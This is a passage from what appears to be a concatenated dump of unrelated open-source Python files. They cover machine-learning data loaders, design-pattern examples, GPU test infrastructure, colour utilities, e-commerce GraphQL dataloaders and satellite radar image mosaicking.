features['ent'][i, ele] = 1
if self.config['use_em']:
features['em'] = to_float_tensor(data[k]['em'][index]).unsqueeze(-1)
if self.config['use_em_lemma']:
features['em_lemma'] = to_float_tensor(data[k]['em_lemma'][index]).unsqueeze(-1)
if len(features) > 0:
add_features[k] = torch.cat(list(features.values()), dim=-1)
return add_features
class SortedBatchSampler(Sampler):
"""
forked from https://github.com/HKUST-KnowComp/MnemonicReader
"""
def __init__(self, lengths, batch_size, shuffle=True):
self.lengths = lengths # (2, data_num)
self.batch_size = batch_size
self.shuffle = shuffle
def __iter__(self):
lengths = np.array(
[(-l[0], -l[1], np.random.random()) for l in self.lengths.T],
dtype=[('l1', np.int_), ('l2', np.int_), ('rand', np.float_)]
)
indices = np.argsort(lengths, order=('l1', 'l2', 'rand'))
batches = [indices[i:i + self.batch_size]
for i in range(0, len(indices), self.batch_size)]
last = batches[-1] # last batch may not be full batch size
if self.shuffle:
batches = batches[:len(batches)-1]
np.random.shuffle(batches)
batches.append(last)
return iter([i for batch in batches for i in batch])
def __len__(self):
return self.lengths.shape[1]
|
38-neuro-monolithic/tf-38-learning.py | cyyeh/exercises-in-programming-style | 1,821 | 12748783 | <gh_stars>1000+
from keras.models import Sequential
from keras.layers import Dense
from keras.losses import binary_crossentropy, categorical_crossentropy
from keras.optimizers import SGD
from keras. metrics import top_k_categorical_accuracy
from keras import backend as K
import numpy as np
import sys, os, string, random
characters = string.printable
char_indices = dict((c, i) for i, c in enumerate(characters))
indices_char = dict((i, c) for i, c in enumerate(characters))
INPUT_VOCAB_SIZE = len(characters)
LINE_SIZE = 80
BATCH_SIZE = 200
STEPS_PER_EPOCH = 5000
EPOCHS = 4
def encode_one_hot(line):
x = np.zeros((1, LINE_SIZE, INPUT_VOCAB_SIZE))
sp_idx = char_indices[' ']
for i, c in enumerate(line):
index = char_indices[c] if c in characters else sp_idx
x[0][i][index] = 1
# Pad with spaces
for i in range(len(line), LINE_SIZE):
x[0][i][sp_idx] = 1
return x.reshape([1, LINE_SIZE*INPUT_VOCAB_SIZE])
def decode_one_hot(y):
s = []
x = y.reshape([1, LINE_SIZE, INPUT_VOCAB_SIZE])
for onehot in x[0]:
one_index = np.argmax(onehot)
s.append(indices_char[one_index])
return ''.join(s)
def input_generator(nsamples):
def generate_line():
inline = []; outline = []
for _ in range(LINE_SIZE):
c = random.choice(characters)
expected = c.lower() if c in string.ascii_letters else ' '
inline.append(c); outline.append(expected)
for i in range(LINE_SIZE):
if outline[i] == ' ': continue
if i > 0 and i < LINE_SIZE - 1:
outline[i] = ' ' if outline[i-1] == ' ' and outline[i+1] == ' ' else outline[i]
if (i == 0 and outline[i+1] == ' ') or (i == LINE_SIZE-1 and outline[i-1] == ' '):
outline[i] = ' '
return ''.join(inline), ''.join(outline)
while True:
data_in = np.zeros((nsamples, LINE_SIZE * INPUT_VOCAB_SIZE))
data_out = np.zeros((nsamples, LINE_SIZE * INPUT_VOCAB_SIZE))
for i in range(nsamples):
input_data, expected = generate_line()
data_in[i] = encode_one_hot(input_data)[0]
data_out[i] = encode_one_hot(expected)[0]
yield data_in, data_out
def train(model):
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
input_gen = input_generator(BATCH_SIZE)
validation_gen = input_generator(BATCH_SIZE)
model.fit_generator(input_gen,
epochs = EPOCHS, workers=1,
steps_per_epoch = STEPS_PER_EPOCH,
validation_data = validation_gen,
validation_steps = 10)
def build_model():
# Normalize characters using a dense layer
model = Sequential()
model.add(Dense(LINE_SIZE*INPUT_VOCAB_SIZE,
input_shape=(LINE_SIZE*INPUT_VOCAB_SIZE,),
activation='sigmoid'))
return model
def build_deep_model():
# Normalize characters using a dense layer
model = Sequential()
model.add(Dense(80,
input_shape=(LINE_SIZE*INPUT_VOCAB_SIZE,),
activation='sigmoid'))
model.add(Dense(800, activation='sigmoid'))
model.add(Dense(LINE_SIZE*INPUT_VOCAB_SIZE, activation='sigmoid'))
return model
model = build_deep_model()
model.summary()
train(model)
input("Network has been trained. Press <Enter> to run program.")
with open(sys.argv[1]) as f:
for line in f:
if line.isspace(): continue
batch = encode_one_hot(line)
preds = model.predict(batch)
normal = decode_one_hot(preds)
print(normal) |
mmtrack/datasets/pipelines/loading.py | BigBen0519/mmtracking | 2,226 | 12748787 | <filename>mmtrack/datasets/pipelines/loading.py
# Copyright (c) OpenMMLab. All rights reserved.
from mmdet.datasets.builder import PIPELINES
from mmdet.datasets.pipelines import LoadAnnotations, LoadImageFromFile
from mmtrack.core import results2outs
@PIPELINES.register_module()
class LoadMultiImagesFromFile(LoadImageFromFile):
"""Load multi images from file.
Please refer to `mmdet.datasets.pipelines.loading.py:LoadImageFromFile`
for detailed docstring.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __call__(self, results):
"""Call function.
For each dict in `results`, call the call function of
`LoadImageFromFile` to load image.
Args:
results (list[dict]): List of dict from
:obj:`mmtrack.CocoVideoDataset`.
Returns:
list[dict]: List of dict that contains loaded image.
"""
outs = []
for _results in results:
_results = super().__call__(_results)
outs.append(_results)
return outs
@PIPELINES.register_module()
class SeqLoadAnnotations(LoadAnnotations):
"""Sequence load annotations.
Please refer to `mmdet.datasets.pipelines.loading.py:LoadAnnotations`
for detailed docstring.
Args:
with_track (bool): If True, load instance ids of bboxes.
"""
def __init__(self, with_track=False, *args, **kwargs):
super().__init__(*args, **kwargs)
self.with_track = with_track
def _load_track(self, results):
"""Private function to load label annotations.
Args:
results (dict): Result dict from :obj:`mmtrack.CocoVideoDataset`.
Returns:
dict: The dict contains loaded label annotations.
"""
results['gt_instance_ids'] = results['ann_info']['instance_ids'].copy()
return results
def __call__(self, results):
"""Call function.
For each dict in results, call the call function of `LoadAnnotations`
to load annotation.
Args:
results (list[dict]): List of dict that from
:obj:`mmtrack.CocoVideoDataset`.
Returns:
list[dict]: List of dict that contains loaded annotations, such as
bounding boxes, labels, instance ids, masks and semantic
segmentation annotations.
"""
outs = []
for _results in results:
_results = super().__call__(_results)
if self.with_track:
_results = self._load_track(_results)
outs.append(_results)
return outs
@PIPELINES.register_module()
class LoadDetections(object):
"""Load public detections from MOT benchmark.
Args:
results (dict): Result dict from :obj:`mmtrack.CocoVideoDataset`.
"""
def __call__(self, results):
outs_det = results2outs(bbox_results=results['detections'])
bboxes = outs_det['bboxes']
labels = outs_det['labels']
results['public_bboxes'] = bboxes[:, :4]
if bboxes.shape[1] > 4:
results['public_scores'] = bboxes[:, -1]
results['public_labels'] = labels
results['bbox_fields'].append('public_bboxes')
return results
|
Creational/Factory-Method/python/FactoryMethod.py | Hkataya/design-patterns | 294 | 12748796 | <reponame>Hkataya/design-patterns<filename>Creational/Factory-Method/python/FactoryMethod.py
from abc import ABC, abstractmethod
class Creator(ABC):
def some_operation(self):
product = self.create_product()
product.do_stuff()
@abstractmethod
def create_product(self):
pass
class Product(ABC):
@abstractmethod
def do_stuff(self):
pass
class ConcreteProductAlpha(Product):
def do_stuff(self):
print("Stuff of product Alpha")
class ConcreteCreatorAlpha(Creator):
def create_product(self):
return ConcreteProductAlpha()
class ConcreteProductBeta(Product):
def do_stuff(self):
print("Stuff of product Beta")
class ConcreteCreatorBeta(Creator):
def create_product(self):
return ConcreteProductBeta()
def main():
creatorAlpha = ConcreteCreatorAlpha()
creatorAlpha.some_operation()
creatorBeta = ConcreteCreatorBeta()
creatorBeta.some_operation()
if __name__ == "__main__":
main()
|
supervisor/scripts/sample_exiting_eventlistener.py | LexMachinaInc/supervisor | 365 | 12748826 | <filename>supervisor/scripts/sample_exiting_eventlistener.py
#!/usr/bin/env python
# A sample long-running supervisor event listener which demonstrates
# how to accept event notifications from supervisor and how to respond
# properly. It is the same as the sample_eventlistener.py script
# except it exits after each request (presumably to be restarted by
# supervisor). This demonstration does *not* use the
# supervisor.childutils module, which wraps the specifics of
# communications in higher-level API functions. If your listeners are
# implemented using Python, it is recommended that you use the
# childutils module API instead of modeling your scripts on the
# lower-level protocol example below.
import sys
def write_stdout(s):
sys.stdout.write(s)
sys.stdout.flush()
def write_stderr(s):
sys.stderr.write(s)
sys.stderr.flush()
def main():
write_stdout('READY\n') # transition from ACKNOWLEDGED to READY
line = sys.stdin.readline() # read a line from stdin from supervisord
write_stderr(line) # print it out to stderr (testing only)
headers = dict([ x.split(':') for x in line.split() ])
data = sys.stdin.read(int(headers['len'])) # read the event payload
write_stderr(data) # print the event payload to stderr (testing only)
write_stdout('RESULT 2\nOK') # transition from READY to ACKNOWLEDGED
# exit, if the eventlistener process config has autorestart=true,
# it will be restarted by supervisord.
if __name__ == '__main__':
main()
|
content/test/gpu/gpu_tests/cloud_storage_test_base.py | iplo/Chain | 231 | 12748831 | <gh_stars>100-1000
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Base classes for a test and validator which upload results
(reference images, error images) to cloud storage."""
import os
import re
import tempfile
from telemetry import test
from telemetry.core import bitmap
from telemetry.page import cloud_storage
from telemetry.page import page_test
test_data_dir = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', 'data', 'gpu'))
default_generated_data_dir = os.path.join(test_data_dir, 'generated')
error_image_cloud_storage_bucket = 'chromium-browser-gpu-tests'
class ValidatorBase(page_test.PageTest):
def __init__(self, test_method_name):
super(ValidatorBase, self).__init__(test_method_name)
# Parameters for cloud storage reference images.
self.vendor_id = None
self.device_id = None
self.vendor_string = None
self.device_string = None
self.msaa = False
###
### Routines working with the local disk (only used for local
### testing without a cloud storage account -- the bots do not use
### this code path).
###
def _UrlToImageName(self, url):
image_name = re.sub(r'^(http|https|file)://(/*)', '', url)
image_name = re.sub(r'\.\./', '', image_name)
image_name = re.sub(r'(\.|/|-)', '_', image_name)
return image_name
def _WriteImage(self, image_path, png_image):
output_dir = os.path.dirname(image_path)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
png_image.WritePngFile(image_path)
def _WriteErrorImages(self, img_dir, img_name, screenshot, ref_png):
full_image_name = img_name + '_' + str(self.options.build_revision)
full_image_name = full_image_name + '.png'
# Always write the failing image.
self._WriteImage(
os.path.join(img_dir, 'FAIL_' + full_image_name), screenshot)
if ref_png:
# Save the reference image.
# This ensures that we get the right revision number.
self._WriteImage(
os.path.join(img_dir, full_image_name), ref_png)
# Save the difference image.
diff_png = screenshot.Diff(ref_png)
self._WriteImage(
os.path.join(img_dir, 'DIFF_' + full_image_name), diff_png)
###
### Cloud storage code path -- the bots use this.
###
def _ComputeGpuInfo(self, tab):
if ((self.vendor_id and self.device_id) or
(self.vendor_string and self.device_string)):
return
browser = tab.browser
if not browser.supports_system_info:
raise Exception('System info must be supported by the browser')
system_info = browser.GetSystemInfo()
if not system_info.gpu:
raise Exception('GPU information was absent')
device = system_info.gpu.devices[0]
if device.vendor_id and device.device_id:
self.vendor_id = device.vendor_id
self.device_id = device.device_id
elif device.vendor_string and device.device_string:
self.vendor_string = device.vendor_string
self.device_string = device.device_string
else:
raise Exception('GPU device information was incomplete')
self.msaa = not (
'disable_multisampling' in system_info.gpu.driver_bug_workarounds)
def _FormatGpuInfo(self, tab):
self._ComputeGpuInfo(tab)
msaa_string = '_msaa' if self.msaa else '_non_msaa'
if self.vendor_id:
return '%s_%04x_%04x%s' % (
self.options.os_type, self.vendor_id, self.device_id, msaa_string)
else:
return '%s_%s_%s%s' % (
self.options.os_type, self.vendor_string, self.device_string,
msaa_string)
def _FormatReferenceImageName(self, img_name, page, tab):
return '%s_v%s_%s.png' % (
img_name,
page.revision,
self._FormatGpuInfo(tab))
def _UploadBitmapToCloudStorage(self, bucket, name, bitmap, public=False):
# This sequence of steps works on all platforms to write a temporary
# PNG to disk, following the pattern in bitmap_unittest.py. The key to
# avoiding PermissionErrors seems to be to not actually try to write to
# the temporary file object, but to re-open its name for all operations.
temp_file = tempfile.NamedTemporaryFile().name
bitmap.WritePngFile(temp_file)
cloud_storage.Insert(bucket, name, temp_file, publicly_readable=public)
def _ConditionallyUploadToCloudStorage(self, img_name, page, tab, screenshot):
"""Uploads the screenshot to cloud storage as the reference image
for this test, unless it already exists. Returns True if the
upload was actually performed."""
if not self.options.refimg_cloud_storage_bucket:
raise Exception('--refimg-cloud-storage-bucket argument is required')
cloud_name = self._FormatReferenceImageName(img_name, page, tab)
if not cloud_storage.Exists(self.options.refimg_cloud_storage_bucket,
cloud_name):
self._UploadBitmapToCloudStorage(self.options.refimg_cloud_storage_bucket,
cloud_name,
screenshot)
return True
return False
def _DownloadFromCloudStorage(self, img_name, page, tab):
"""Downloads the reference image for the given test from cloud
storage, returning it as a Telemetry Bitmap object."""
# TODO(kbr): there's a race condition between the deletion of the
# temporary file and gsutil's overwriting it.
if not self.options.refimg_cloud_storage_bucket:
raise Exception('--refimg-cloud-storage-bucket argument is required')
temp_file = tempfile.NamedTemporaryFile().name
cloud_storage.Get(self.options.refimg_cloud_storage_bucket,
self._FormatReferenceImageName(img_name, page, tab),
temp_file)
return bitmap.Bitmap.FromPngFile(temp_file)
def _UploadErrorImagesToCloudStorage(self, image_name, screenshot, ref_img):
"""For a failing run, uploads the failing image, reference image (if
supplied), and diff image (if reference image was supplied) to cloud
storage. This subsumes the functionality of the
archive_gpu_pixel_test_results.py script."""
machine_name = re.sub('\W+', '_', self.options.test_machine_name)
upload_dir = '%s_%s_telemetry' % (self.options.build_revision, machine_name)
base_bucket = '%s/runs/%s' % (error_image_cloud_storage_bucket, upload_dir)
image_name_with_revision = '%s_%s.png' % (
image_name, self.options.build_revision)
self._UploadBitmapToCloudStorage(
base_bucket + '/gen', image_name_with_revision, screenshot,
public=True)
if ref_img:
self._UploadBitmapToCloudStorage(
base_bucket + '/ref', image_name_with_revision, ref_img, public=True)
diff_img = screenshot.Diff(ref_img)
self._UploadBitmapToCloudStorage(
base_bucket + '/diff', image_name_with_revision, diff_img,
public=True)
print ('See http://%s.commondatastorage.googleapis.com/'
'view_test_results.html?%s for this run\'s test results') % (
error_image_cloud_storage_bucket, upload_dir)
class TestBase(test.Test):
@staticmethod
def _AddTestCommandLineOptions(parser, option_group):
option_group.add_option('--build-revision',
help='Chrome revision being tested.',
default="unknownrev")
option_group.add_option('--upload-refimg-to-cloud-storage',
dest='upload_refimg_to_cloud_storage',
action='store_true', default=False,
help='Upload resulting images to cloud storage as reference images')
option_group.add_option('--download-refimg-from-cloud-storage',
dest='download_refimg_from_cloud_storage',
action='store_true', default=False,
help='Download reference images from cloud storage')
option_group.add_option('--refimg-cloud-storage-bucket',
help='Name of the cloud storage bucket to use for reference images; '
'required with --upload-refimg-to-cloud-storage and '
'--download-refimg-from-cloud-storage. Example: '
'"chromium-gpu-archive/reference-images"')
option_group.add_option('--os-type',
help='Type of operating system on which the pixel test is being run, '
'used only to distinguish different operating systems with the same '
'graphics card. Any value is acceptable, but canonical values are '
'"win", "mac", and "linux", and probably, eventually, "chromeos" '
'and "android").',
default='')
option_group.add_option('--test-machine-name',
help='Name of the test machine. Specifying this argument causes this '
'script to upload failure images and diffs to cloud storage directly, '
'instead of relying on the archive_gpu_pixel_test_results.py script.',
default='')
option_group.add_option('--generated-dir',
help='Overrides the default on-disk location for generated test images '
'(only used for local testing without a cloud storage account)',
default=default_generated_data_dir)
|
arcade/drawing_support.py | janscas/arcade | 824 | 12748848 | <reponame>janscas/arcade<filename>arcade/drawing_support.py
"""
Functions used to support drawing. No Pyglet/OpenGL here.
"""
import math
from typing import Tuple, Union, cast
from arcade import Color
from arcade import RGBA, RGB
def get_points_for_thick_line(start_x: float, start_y: float,
end_x: float, end_y: float,
line_width: float):
"""
Function used internally for Arcade. OpenGL draws triangles only, so a think
line must be two triangles that make up a rectangle. This calculates those
points.
"""
vector_x = start_x - end_x
vector_y = start_y - end_y
perpendicular_x = vector_y
perpendicular_y = -vector_x
length = math.sqrt(vector_x * vector_x + vector_y * vector_y)
if length == 0:
normal_x = 1.0
normal_y = 1.0
else:
normal_x = perpendicular_x / length
normal_y = perpendicular_y / length
r1_x = start_x + normal_x * line_width / 2
r1_y = start_y + normal_y * line_width / 2
r2_x = start_x - normal_x * line_width / 2
r2_y = start_y - normal_y * line_width / 2
r3_x = end_x + normal_x * line_width / 2
r3_y = end_y + normal_y * line_width / 2
r4_x = end_x - normal_x * line_width / 2
r4_y = end_y - normal_y * line_width / 2
points = (r1_x, r1_y), (r2_x, r2_y), (r4_x, r4_y), (r3_x, r3_y)
return points
def get_four_byte_color(color: Color) -> RGBA:
"""
Given a RGB list, it will return RGBA.
Given a RGBA list, it will return the same RGBA.
:param Color color: Three or four byte tuple
:returns: return: Four byte RGBA tuple
"""
if len(color) == 4:
return cast(RGBA, color)
elif len(color) == 3:
return color[0], color[1], color[2], 255
else:
raise ValueError("This isn't a 3 or 4 byte color")
def get_four_float_color(color: Color) -> Tuple[float, float, float, float]:
"""
Given a 3 or 4 RGB/RGBA color where each color goes 0-255, this
returns a RGBA tuple where each item is a scaled float from 0 to 1.
:param Color color: Three or four byte tuple
:return: Four floats as a RGBA tuple
"""
if len(color) == 4:
return color[0] / 255, color[1] / 255, color[2] / 255, color[3] / 255 # type: ignore
elif len(color) == 3:
return color[0] / 255, color[1] / 255, color[2] / 255, 1.0
else:
raise ValueError("This isn't a 3 or 4 byte color")
def get_three_float_color(color: Color) -> Tuple[float, float, float]:
"""
Given a 3 or 4 RGB/RGBA color where each color goes 0-255, this
returns a RGBA tuple where each item is a scaled float from 0 to 1.
:param Color color: Three or four byte tuple
:return: Three floats as a RGB tuple
"""
if len(color) == 4 or len(color) == 3:
return color[0] / 255, color[1] / 255, color[2] / 255 # type: ignore
else:
raise ValueError("This isn't a 3 or 4 byte color")
def make_transparent_color(color: Color, transparency: float):
"""
Given a RGB color, along with an alpha, returns a RGBA color tuple.
:param Color color: Three or four byte RGBA color
:param float transparency: Transparency
"""
return color[0], color[1], color[2], transparency
def uint24_to_three_byte_color(color: int) -> RGB:
"""
Given an int between 0 and 16777215, return a RGB color tuple.
:param int color: 3 byte int
"""
return (color & (255 << 16)) >> 16, (color & (255 << 8)) >> 8, color & 255
def uint32_to_four_byte_color(color: int) -> RGBA:
"""
Given an int between 0 and 4294967295, return a RGBA color tuple.
:param int color: 4 byte int
"""
return (color & (255 << 24)) >> 24, (color & (255 << 16)) >> 16, (color & (255 << 8)) >> 8, color & 255
def color_from_hex_string(code: str) -> RGBA:
"""
Make a color from a hex code (3, 4, 6 or 8 characters of hex, normally with a hashtag)
"""
code = code.lstrip("#")
if len(code) <= 4:
code = "".join(i + "0" for i in code)
if len(code) == 6:
# full opacity if no alpha specified
return int(code[0:2], 16), int(code[2:4], 16), int(code[4:6], 16), 255
elif len(code) == 8:
return int(code[2:4], 16), int(code[4:6], 16), int(code[6:8], 16), int(code[0:2], 16)
raise ValueError("Improperly formatted color passed to color_from_hex")
def float_to_byte_color(
color: Union[Tuple[float, float, float, float], Tuple[float, float, float]],
) -> Color:
"""
Converts a float colors to a byte color.
This works for 3 of 4-component colors.
"""
if len(color) == 3:
return int(color[0] * 255), int(color[1] * 255), int(color[2] * 255)
elif len(color) == 4:
color = cast(Tuple[float, float, float, float], color)
return int(color[0] * 255), int(color[1] * 255), int(color[2] * 255), int(color[3] * 255)
else:
raise ValueError(f"color needs to have 3 or 4 components, not {color}")
|
L1Trigger/L1TMuonEndCap/test/tools/print_sector.py | ckamtsikis/cmssw | 852 | 12748882 | <gh_stars>100-1000
#!/usr/bin/env python
from __future__ import print_function
import sys
from math import degrees, pi
def main():
if len(sys.argv) < 2:
print("Usage: %s radian" % sys.argv[0])
return
rad = eval(sys.argv[1])
if rad <= 0.:
rad += 2*pi
deg = degrees(rad)
print("rad: {0} deg: {1}".format(rad, deg))
sector = int((deg - 15)/60.) + 1
print("{0:d}".format(sector))
return
# ______________________________________________________________________________
if __name__ == '__main__':
main()
|
saleor/graphql/channel/dataloaders.py | fairhopeweb/saleor | 15,337 | 12748908 | from collections import defaultdict
from django.db.models import Exists, OuterRef
from ...channel.models import Channel
from ...order.models import Order
from ...shipping.models import ShippingZone
from ..checkout.dataloaders import CheckoutByIdLoader, CheckoutLineByIdLoader
from ..core.dataloaders import DataLoader
from ..order.dataloaders import OrderByIdLoader, OrderLineByIdLoader
from ..shipping.dataloaders import ShippingZoneByIdLoader
class ChannelByIdLoader(DataLoader):
context_key = "channel_by_id"
def batch_load(self, keys):
channels = Channel.objects.in_bulk(keys)
return [channels.get(channel_id) for channel_id in keys]
class ChannelBySlugLoader(DataLoader):
context_key = "channel_by_slug"
def batch_load(self, keys):
channels = Channel.objects.in_bulk(keys, field_name="slug")
return [channels.get(slug) for slug in keys]
class ChannelByCheckoutLineIDLoader(DataLoader):
context_key = "channel_by_checkout_line"
def batch_load(self, keys):
def channel_by_lines(checkout_lines):
checkout_ids = [line.checkout_id for line in checkout_lines]
def channels_by_checkout(checkouts):
channel_ids = [checkout.channel_id for checkout in checkouts]
return ChannelByIdLoader(self.context).load_many(channel_ids)
return (
CheckoutByIdLoader(self.context)
.load_many(checkout_ids)
.then(channels_by_checkout)
)
return (
CheckoutLineByIdLoader(self.context).load_many(keys).then(channel_by_lines)
)
class ChannelByOrderLineIdLoader(DataLoader):
context_key = "channel_by_orderline"
def batch_load(self, keys):
def channel_by_lines(order_lines):
order_ids = [line.order_id for line in order_lines]
def channels_by_checkout(orders):
channel_ids = [order.channel_id for order in orders]
return ChannelByIdLoader(self.context).load_many(channel_ids)
return (
OrderByIdLoader(self.context)
.load_many(order_ids)
.then(channels_by_checkout)
)
return OrderLineByIdLoader(self.context).load_many(keys).then(channel_by_lines)
class ChannelWithHasOrdersByIdLoader(DataLoader):
context_key = "channel_with_has_orders_by_id"
def batch_load(self, keys):
orders = Order.objects.filter(channel=OuterRef("pk"))
channels = Channel.objects.annotate(has_orders=Exists(orders)).in_bulk(keys)
return [channels.get(channel_id) for channel_id in keys]
class ShippingZonesByChannelIdLoader(DataLoader):
context_key = "shippingzone_by_channel"
def batch_load(self, keys):
zone_and_channel_is_pairs = ShippingZone.objects.filter(
channels__id__in=keys
).values_list("pk", "channels__id")
channel_shipping_zone_map = defaultdict(list)
for zone_id, channel_id in zone_and_channel_is_pairs:
channel_shipping_zone_map[channel_id].append(zone_id)
def map_shipping_zones(shipping_zones):
zone_map = {zone.pk: zone for zone in shipping_zones}
return [
[zone_map[zone_id] for zone_id in channel_shipping_zone_map[channel_id]]
for channel_id in keys
]
return (
ShippingZoneByIdLoader(self.context)
.load_many({pk for pk, _ in zone_and_channel_is_pairs})
.then(map_shipping_zones)
)
|
venv/lib/python3.9/site-packages/py2app/bootstrap/reset_sys_path.py | dequeb/asmbattle | 193 | 12748926 | def _reset_sys_path():
# Clear generic sys.path[0]
import os
import sys
resources = os.environ["RESOURCEPATH"]
while sys.path[0] == resources:
del sys.path[0]
_reset_sys_path()
|
src/seedwork/infrastructure/test_repository.py | Ermlab/python-ddd | 308 | 12748929 | from seedwork.infrastructure.repository import InMemoryRepository
from seedwork.domain.entities import Entity
class Person(Entity):
first_name: str
last_name: str
def test_InMemoryRepository_persist_one():
# arrange
person = Person(first_name="John", last_name="Doe")
repository = InMemoryRepository()
# act
repository.insert(person)
# assert
assert repository.get_by_id(person.id) == person
def test_InMemoryRepository_persist_two():
# arrange
person1 = Person(first_name="John", last_name="Doe")
person2 = Person(first_name="Mary", last_name="Doe")
repository = InMemoryRepository()
# act
repository.insert(person1)
repository.insert(person2)
# assert
assert repository.get_by_id(person1.id) == person1
assert repository.get_by_id(person2.id) == person2
|
components/isceobj/Alos2burstProc/runSwathMosaic.py | vincentschut/isce2 | 1,133 | 12748932 | #
# Author: <NAME>
# Copyright 2015-present, NASA-JPL/Caltech
#
import os
import logging
import isceobj
from isceobj.Alos2Proc.runSwathMosaic import swathMosaic
from isceobj.Alos2Proc.runSwathMosaic import swathMosaicParameters
from isceobj.Alos2Proc.Alos2ProcPublic import create_xml
logger = logging.getLogger('isce.alos2burstinsar.runSwathMosaic')
def runSwathMosaic(self):
'''mosaic subswaths
'''
catalog = isceobj.Catalog.createCatalog(self._insar.procDoc.name)
self.updateParamemetersFromUser()
referenceTrack = self._insar.loadTrack(reference=True)
secondaryTrack = self._insar.loadTrack(reference=False)
for i, frameNumber in enumerate(self._insar.referenceFrames):
frameDir = 'f{}_{}'.format(i+1, frameNumber)
os.chdir(frameDir)
mosaicDir = 'mosaic'
os.makedirs(mosaicDir, exist_ok=True)
os.chdir(mosaicDir)
if self._insar.endingSwath-self._insar.startingSwath+1 == 1:
import shutil
swathDir = 's{}'.format(referenceTrack.frames[i].swaths[0].swathNumber)
if not os.path.isfile(self._insar.interferogram):
os.symlink(os.path.join('../', swathDir, self._insar.interferogram), self._insar.interferogram)
shutil.copy2(os.path.join('../', swathDir, self._insar.interferogram+'.vrt'), self._insar.interferogram+'.vrt')
shutil.copy2(os.path.join('../', swathDir, self._insar.interferogram+'.xml'), self._insar.interferogram+'.xml')
if not os.path.isfile(self._insar.amplitude):
os.symlink(os.path.join('../', swathDir, self._insar.amplitude), self._insar.amplitude)
shutil.copy2(os.path.join('../', swathDir, self._insar.amplitude+'.vrt'), self._insar.amplitude+'.vrt')
shutil.copy2(os.path.join('../', swathDir, self._insar.amplitude+'.xml'), self._insar.amplitude+'.xml')
# os.rename(os.path.join('../', swathDir, self._insar.interferogram), self._insar.interferogram)
# os.rename(os.path.join('../', swathDir, self._insar.interferogram+'.vrt'), self._insar.interferogram+'.vrt')
# os.rename(os.path.join('../', swathDir, self._insar.interferogram+'.xml'), self._insar.interferogram+'.xml')
# os.rename(os.path.join('../', swathDir, self._insar.amplitude), self._insar.amplitude)
# os.rename(os.path.join('../', swathDir, self._insar.amplitude+'.vrt'), self._insar.amplitude+'.vrt')
# os.rename(os.path.join('../', swathDir, self._insar.amplitude+'.xml'), self._insar.amplitude+'.xml')
#update frame parameters
#########################################################
frame = referenceTrack.frames[i]
infImg = isceobj.createImage()
infImg.load(self._insar.interferogram+'.xml')
#mosaic size
frame.numberOfSamples = infImg.width
frame.numberOfLines = infImg.length
#NOTE THAT WE ARE STILL USING SINGLE LOOK PARAMETERS HERE
#range parameters
frame.startingRange = frame.swaths[0].startingRange
frame.rangeSamplingRate = frame.swaths[0].rangeSamplingRate
frame.rangePixelSize = frame.swaths[0].rangePixelSize
#azimuth parameters
frame.sensingStart = frame.swaths[0].sensingStart
frame.prf = frame.swaths[0].prf
frame.azimuthPixelSize = frame.swaths[0].azimuthPixelSize
frame.azimuthLineInterval = frame.swaths[0].azimuthLineInterval
#update frame parameters, secondary
#########################################################
frame = secondaryTrack.frames[i]
#mosaic size
frame.numberOfSamples = int(frame.swaths[0].numberOfSamples/self._insar.numberRangeLooks1)
frame.numberOfLines = int(frame.swaths[0].numberOfLines/self._insar.numberAzimuthLooks1)
#NOTE THAT WE ARE STILL USING SINGLE LOOK PARAMETERS HERE
#range parameters
frame.startingRange = frame.swaths[0].startingRange
frame.rangeSamplingRate = frame.swaths[0].rangeSamplingRate
frame.rangePixelSize = frame.swaths[0].rangePixelSize
#azimuth parameters
frame.sensingStart = frame.swaths[0].sensingStart
frame.prf = frame.swaths[0].prf
frame.azimuthPixelSize = frame.swaths[0].azimuthPixelSize
frame.azimuthLineInterval = frame.swaths[0].azimuthLineInterval
os.chdir('../')
#save parameter file
self._insar.saveProduct(referenceTrack.frames[i], self._insar.referenceFrameParameter)
self._insar.saveProduct(secondaryTrack.frames[i], self._insar.secondaryFrameParameter)
os.chdir('../')
continue
#choose offsets
numberOfFrames = len(referenceTrack.frames)
numberOfSwaths = len(referenceTrack.frames[i].swaths)
if self.swathOffsetMatching:
#no need to do this as the API support 2-d list
#rangeOffsets = (np.array(self._insar.swathRangeOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetMatchingReference
azimuthOffsets = self._insar.swathAzimuthOffsetMatchingReference
else:
#rangeOffsets = (np.array(self._insar.swathRangeOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetGeometricalReference
azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalReference
rangeOffsets = rangeOffsets[i]
azimuthOffsets = azimuthOffsets[i]
#list of input files
inputInterferograms = []
inputAmplitudes = []
for j, swathNumber in enumerate(range(self._insar.startingSwath, self._insar.endingSwath + 1)):
swathDir = 's{}'.format(swathNumber)
inputInterferograms.append(os.path.join('../', swathDir, self._insar.interferogram))
inputAmplitudes.append(os.path.join('../', swathDir, self._insar.amplitude))
#note that frame parameters are updated after mosaicking
#mosaic amplitudes
swathMosaic(referenceTrack.frames[i], inputAmplitudes, self._insar.amplitude,
rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, resamplingMethod=0)
#mosaic interferograms
swathMosaic(referenceTrack.frames[i], inputInterferograms, self._insar.interferogram,
rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, updateFrame=True, resamplingMethod=1)
create_xml(self._insar.amplitude, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'amp')
create_xml(self._insar.interferogram, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'int')
#update secondary frame parameters here
#no matching for secondary, always use geometry
rangeOffsets = self._insar.swathRangeOffsetGeometricalSecondary
azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalSecondary
rangeOffsets = rangeOffsets[i]
azimuthOffsets = azimuthOffsets[i]
